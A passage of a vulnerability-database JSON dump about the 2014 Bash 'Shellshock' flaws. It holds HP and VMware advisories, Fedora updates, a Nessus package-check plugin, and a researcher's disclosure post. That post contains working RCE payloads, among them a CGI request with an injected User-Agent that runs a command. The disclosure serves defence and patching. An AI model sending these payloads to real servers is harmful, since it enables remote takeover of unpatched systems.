For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQsiJAACgkQ4B86/C0qfVkNaACguv7uwEW8LXyHRpAZ7rsOihoS\r\nmTcAn1o+pVwNz5a5E5FKWg/w0fJHt0Sx\r\n=6l1G\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "[security bulletin] HPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31130", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31130", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nVMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2014-0010\r\nSynopsis: VMware product updates address critical Bash \r\n security vulnerabilities\r\nIssue date: 2014-09-30\r\nUpdated on: 2014-09-30 (Initial Advisory)\r\nCVE numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, \r\n CVE-2014-7187\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware product updates address Bash security vulnerabilities.\r\n\r\n2. Relevant Releases (Affected products for which remediation is present)\r\n\r\n vCenter Log Insight 2.0\r\n\r\n3. Problem Description \r\n\r\n a. 
Bash update for multiple products.\r\n\r\n Bash libraries have been updated in multiple products to resolve \r\n multiple critical security issues, also referred to as Shellshock.\r\n \r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the identifiers CVE-2014-6271, CVE-2014-7169, \r\n CVE-2014-7186, and CVE-2014-7187 to these issues.\r\n\r\n VMware products have been grouped into the following four\r\n product categories:\r\n \r\n I) ESXi and ESX Hypervisor\r\n ESXi is not affected because ESXi uses the Ash shell (through\r\n busybox), which is not affected by the vulnerability reported\r\n for the Bash shell.\r\n ESX has an affected version of the Bash shell. See table 1 for\r\n remediation for ESX.\r\n \r\n II) Windows-based products\r\n Windows-based products, including all versions of vCenter Server \r\n running on Windows, are not affected.\r\n\r\n III) VMware (virtual) appliances\r\n VMware (virtual) appliances ship with an affected version of Bash. \r\n See table 2 for remediation for appliances.\r\n \r\n IV) Products that run on Linux, Android, OSX or iOS (excluding\r\nvirtual\r\n appliances)\r\n\r\n Products that run on Linux, Android, OSX or iOS (excluding \r\n virtual appliances) might use the Bash shell that is part of the\r\n operating system. If the operating system has a vulnerable\r\n version of Bash, the Bash security vulnerability might be\r\n exploited through the product. VMware recommends that customers\r\n contact their operating system vendor for a patch. \r\n \r\n MITIGATIONS\r\n\r\n VMware encourages restricting access to appliances through\r\n firewall rules and other network layer controls to only trusted IP\r\n addresses. This measure will greatly reduce any risk to these\r\n appliances.\r\n\r\n RECOMMENDATIONS\r\n\r\n VMware recommends customers evaluate and deploy patches for\r\n affected products in Table 1 and 2 below as these\r\n patches become available. 
\r\n\r\n Column 4 of the following tables lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n Table 1 - ESXi and ESX Hypervisor\r\n =================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n ESXi any ESXi Not affected\r\n\r\n ESX 4.1 ESX Patch pending *\r\n\r\n ESX 4.0 ESX Patch pending *\r\n\r\n * VMware will make VMware ESX 4.0 and 4.1 security patches available \r\n for the Bash shell vulnerability. This security patch release is an \r\n exception to the existing VMware lifecycle policy. \r\n\r\n Table 2 - Products that are shipped as a (virtual) appliance. \r\n =============================================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n \r\n vCenter Server Appliance 5.x Linux Patch Pending\r\n Horizon DaaS Platform 6.x Linux Patch Pending\r\n Horizon Workspace 1.x, 2.x Linux Patch Pending\r\n IT Business Management Suite 1.x Linux Patch Pending\r\n NSX for Multi-Hypervisor 4.x Linux Patch Pending\r\n NSX for vSphere 6.x Linux Patch Pending\r\n NVP 3.x Linux Patch Pending\r\n vCenter Converter Standalone 5.x Linux Patch Pending \r\n vCenter Hyperic Server 5.x Linux Patch Pending\r\n vCenter Infrastructure Navigator 5.x Linux Patch Pending\r\n vCenter Log Insight 1.x, 2.x Linux 2.0 U1\r\n vCenter Operations Manager 5.x Linux Patch Pending\r\n vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending\r\n vCenter Site Recovery Manager 5.x Linux Patch Pending\r\n**\r\n vCenter Support Assistant 5.x Linux Patch Pending\r\n vCloud Automation Center 6.x Linux Patch Pending\r\n vCloud Automation Center\r\n Application Services 6.x Linux Patch Pending\r\n vCloud Director Appliance 5.x Linux Patch Pending\r\n vCloud Connector 2.x Linux Patch Pending\r\n vCloud Networking and 
Security 5.x Linux Patch Pending\r\n vCloud Usage Meter 3.x Linux Patch Pending\r\n vFabric Application Director 5.x, 6.x Linux Patch Pending\r\n vFabric Postgres 9.x Linux Patch Pending\r\n Viewplanner 3.x Linux Patch Pending\r\n VMware Application Dependency \r\n Planner x.x Linux Patch Pending\r\n VMware Data Recovery 2.x Linux Patch Pending\r\n VMware HealthAnalyzer 5.x Linux Patch Pending\r\n VMware Mirage Gateway 5.x Linux Patch Pending\r\n VMware Socialcast On Premise x.x Linux Patch Pending\r\n VMware Studio 2.x Linux Patch Pending\r\n VMware TAM Data Manager x.x Linux Patch Pending\r\n VMware Workbench 3.x Linux Patch Pending\r\n vSphere App HA 1.x Linux Patch Pending\r\n vSphere Big Data Extensions 1.x, 2.x Linux Patch Pending\r\n vSphere Data Protection 5.x Linux Patch Pending\r\n vSphere Management Assistant 5.x Linux Patch Pending\r\n vSphere Replication 5.x Linux Patch Pending\r\n vSphere Storage Appliance 5.x Linux Patch Pending\r\n\r\n ** This product includes Virtual Appliances that will be updated, the\r\nproduct \r\n itself is not a Virtual Appliance.\r\n\r\n 4. Solution\r\n\r\n vCenter Log Insight\r\n ----------------------------\r\n Downloads:\r\n https://www.vmware.com/go/download-vcenter-log-insight\r\n (click Go to Downloads)\r\n Documentation:\r\n http://kb.vmware.com/kb/2091065\r\n\r\n5. References\r\n \r\n VMware Knowledge Base Article 2090740\r\n http://kb.vmware.com/kb/2090740\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 , \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n6. 
Change Log\r\n\r\n 2014-09-30 VMSA-2014-0010\r\n Initial security advisory in conjunction with the release of\r\n vCenter Log Insight 2.0 U1 on 2014-09-30.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n \r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n security-announce at lists.vmware.com\r\n bugtraq at securityfocus.com\r\n fulldisclosure at seclists.org\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware Security Response Policy\r\n https://www.vmware.com/support/policies/security_response.html\r\n\r\n VMware Lifecycle Policy\r\n https://www.vmware.com/support/policies/lifecycle.html\r\n \r\n Twitter\r\n https://twitter.com/VMwareSRC\r\n\r\n Copyright 2014 VMware Inc. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Encryption Desktop 10.3.2 (Build 15337)\r\nCharset: utf-8\r\n\r\nwj8DBQFUK2DqDEcm8Vbi9kMRAg4rAJ9wKbbbxeD3cagCry7GGfR4fVLpDwCeMqYm\r\nSfX/140WMvqvcmkPX2chR9s=\r\n=1KVR\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31131", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\nGood morning! 
This is kinda long.\r\n\r\n== Background ==\r\n\r\nIf you are not familiar with the original bash function export\r\nvulnerability (CVE-2014-6271), you may want to have a look at this\r\narticle:\r\n\r\nhttp://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html\r\n\r\nWell, long story short: the initial maintainer-provided patch for this\r\nissue [1] (released on September 24) is *conclusively* broken.\r\n\r\nAfter nagging people to update for a while [5] [7], I wanted to share\r\nthe technical details of two previously non-public issues which may be\r\nused to circumvent the original patch: CVE-2014-6277 and\r\nCVE-2014-6278.\r\n\r\nNote that the issues discussed here are separate from the three\r\nprobably less severe problems publicly disclosed earlier on: Tavis'\r\nlimited-exploitability EOL bug (CVE-2014-7169) and two likely\r\nnon-exploitable one-off issues found by Florian Weimer and Todd Sabin\r\n(CVE-2014-7186 and CVE-2014-7187).\r\n\r\n== Required actions ==\r\n\r\nIf you have installed just the September 24 patch [1], or that and the\r\nfollow-up September 26 patch for CVE-2014-7169 [2], you are likely\r\nstill vulnerable to RCE and need to update ASAP, as discussed in [5].\r\n\r\nYou are safe if you have installed the unofficial function prefix\r\npatch from Florian Weimer [3], or its upstream variant released on\r\nSeptember 28 [4]. The patch does not eliminate the problems, but\r\nshields the underlying parser from untrusted inputs under normal\r\ncircumstances.\r\n\r\nNote: over the past few days, Florian's patch has been picked up by\r\nmajor Linux distros (Red Hat, Debian, SUSE, etc), so there is a\r\nreasonable probability that you are in good shape. To test, execute\r\nthis command from within a bash shell:\r\n\r\nfoo='() { echo not patched; }' bash -c foo\r\n\r\nIf you see "not patched", you probably want to upgrade immediately. 
If\r\nyou see "bash: foo: command not found", you're OK.\r\n\r\n== Vulnerability details: CVE-2014-6277 (the more involved one) ==\r\n\r\nThe following function definition appearing in the value of any\r\nenvironmental variable passed to bash will lead to an attempt to\r\ndereference attacker-controlled pointers (provided that the targeted\r\ninstance of bash is protected only with the original patches [1][2]\r\nand does not include Florian's fix):\r\n\r\n() { x() { _; }; x() { _; } <<a; }\r\n\r\nA more complete example leading to a deref of 0x41414141 would be:\r\n\r\nHTTP_COOKIE="() { x() { _; }; x() { _; } <<`perl -e '{print\r\n"A"x1000}'`; }" bash -c :\r\n\r\nbash[25662]: segfault at 41414141 ip 00190d96 sp bfbe6354 error 4 in\r\nlibc-2.12.so[110000+191000]\r\n\r\n(If you are seeing 0xdfdfdfdf, see note later on).\r\n\r\nThe issue is caused by an uninitialized here_doc_eof field in a REDIR\r\nstruct originally created in make_redirection(). The initial segv will\r\nhappen due to an attempt to read and then copy a string to a new\r\nbuffer through a macro that expands to:\r\n\r\nstrcpy (xmalloc (1 + strlen (redirect->here_doc_eof)), (redirect->here_doc_eof))\r\n\r\nThis appears to be exploitable in at least one way: if here_doc_eof is\r\nchosen by the attacker to point in the vicinity of the current stack\r\npointer, the apparent contents of the string - and therefore its\r\nlength - may change between stack-based calls to xmalloc() and\r\nstrcpy() as a natural consequence of an attempt to pass parameters and\r\ncreate local variables. Such a mid-macro switch will result in an\r\nout-of-bounds write to the newly-allocated memory.\r\n\r\nA simple conceptual illustration of this attack vector would be:\r\n\r\n-- snip! 
--\r\nchar* result;\r\nint len_alloced;\r\n\r\nmain(int argc, char** argv) {\r\n\r\n /* The offset will be system- and compiler-specific */;\r\n char* ptr = &ptr - 9;\r\n\r\n result = strcpy (malloc(100 + (len_alloced = strlen(ptr))), ptr);\r\n\r\n printf("requested memory = %d\n"\r\n "copied text = %d\n", len_alloced + 1, strlen(result) + 1);\r\n\r\n}\r\n-- snip! --\r\n\r\nWhen compiled with the -O2 flag used for bash, on one test system,\r\nthis produces:\r\n\r\nrequested memory = 2\r\ncopied text = 28\r\n\r\nThis can lead to heap corruption, with multiple writes possible per\r\npayload by simply increasing the number of malformed here-docs. The\r\nconsequences should be fairly clear.\r\n\r\n[ There is also a later call to free() on here_doc_eof in\r\ndispose_cmd.c, but because of the simultaneous discovery of the much\r\nsimpler bug '78 discussed in the next section, I have not spent a\r\nwhole lot of time trying to figure out how to get to that path. ]\r\n\r\nPerhaps notably, the ability to specify attacker-controlled addresses\r\nhinges on the state of --enable-bash-malloc and --enable-mem-scramble\r\ncompile-time flags; if both are enabled, the memory returned by\r\nxmalloc() will be initialized to 0xdf, making the prospect of\r\nexploitation more speculative (essentially depending on whether the\r\nstack or any other memory region can be grown to overlap with\r\n0xdfdfdfdf). That said, many Linux distributions disable one or both\r\nflags and are vulnerable out-of-the-box. It is also of note that\r\nrelatively few distributions compile bash as PIE, so there is little\r\nconsolation to be found in ASLR.\r\n\r\nSimilarly to the original vulnerability, this issue can be usually\r\ntriggered remotely through web servers such as Apache (provided that\r\nthey invoke CGI scripts or PHP / Python / Perl / C / Java servlets\r\nthat rely on system() or popen()-type libcalls); through DHCP clients;\r\nand through some MUAs and MTAs. 
For a more detailed discussion of the\r\nexposed attack surface, refer to [6].\r\n\r\n== Vulnerability details: CVE-2014-6278 (the "back to the '90s" one) ==\r\n\r\nThe following function definition appearing in the value of any\r\nenvironmental variable passed to bash 4.2 or 4.3 will lead to\r\nstraightforward put-your-command-here RCE (again, provided that the\r\ntargeted instance is not protected with Florian's patch):\r\n\r\n() { _; } >_[$($())] { echo hi mom; id; }\r\n\r\nA complete example looks like this:\r\n\r\nHTTP_COOKIE='() { _; } >_[$($())] { echo hi mom; id; }' bash -c :\r\n\r\n...or:\r\n\r\nGET /some/script.cgi HTTP/1.0\r\nUser-Agent: () { _; } >_[$($())] { id >/tmp/hi_mom; }\r\n\r\nNote that the PoC does not work as-is in more ancient versions of\r\nbash, such as 2.x or 3.x; it might have been introduced with\r\nxparse_dolparen() starting with bash 4.2 patch level 12 a few years\r\nback, but I have not investigated this in a lot of detail. Florian's\r\npatch is strongly recommended either way.\r\n\r\nThe attack surface through which this flaw may be triggered is roughly\r\nsimilar to that for CVE-2014-6277 and the original bash bug [6].\r\n\r\n== Additional info ==\r\n\r\nBoth of these issues were identified in an automated fashion with\r\namerican fuzzy lop:\r\n\r\nhttps://code.google.com/p/american-fuzzy-lop\r\n\r\nThe out-of-the-box fuzzer was seeded with a minimal valid function\r\ndefinition ("() { foo() { foo; }; >bar; }") and allowed to run for a\r\ncouple of hours on a single core.\r\n\r\nIn addition to the issues discussed above, the fuzzer also hit three\r\nof the four previously-reported CVEs.\r\n\r\nI initially shared the findings privately with vendors, but because of\r\nthe intense scrutiny that this codebase is under, the ease of\r\nreproducing these results with an open-source fuzzer, and the\r\nnow-broad availability of upstream mitigations, there seems to be\r\nrelatively little value in continued secrecy.\r\n\r\n== References 
==\r\n\r\n[1] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025\r\n[2] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026\r\n[3] http://www.openwall.com/lists/oss-security/2014/09/25/13\r\n[4] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027\r\n[5] http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html\r\n[6] http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html\r\n[7] http://www.pcworld.com/article/2688932/improved-patch-tackles-new-shellshock-attack-vectors.html\r\n\r\nPS. There are no other bugs in bash.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "the other bash RCEs (CVE-2014-6277 and CVE-2014-6278)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31129", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31129", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. 
", "edition": 2, "cvss3": {}, "published": "2014-10-05T08:13:46", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: bash-4.2.51-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-10-05T08:13:46", "id": "FEDORA:652DB21498", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. 
", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-26T09:03:00", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T09:03:00", "id": "FEDORA:6FC4121113", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. 
", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-27T10:08:26", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: bash-4.3.25-2.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-27T10:08:26", "id": "FEDORA:4A9CF241E0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. 
", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-26T09:00:48", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T09:00:48", "id": "FEDORA:9FE1722338", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-16T14:09:59", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux:13.0"], "id": "SLACKWARE_SSA_2014-268-02.NASL", "href": "https://www.tenable.com/plugins/nessus/77878", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in 
this plugin were \n# extracted from Slackware Security Advisory 2014-268-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77878);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"SSA\", value:\"2014-268-02\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New bash packages are available for Slackware 13.0 to fix a security\nissue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45f8fb5f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"3_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"3_slack13.0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:01", "description": "Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : bash (ELSA-2014-3077)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", 
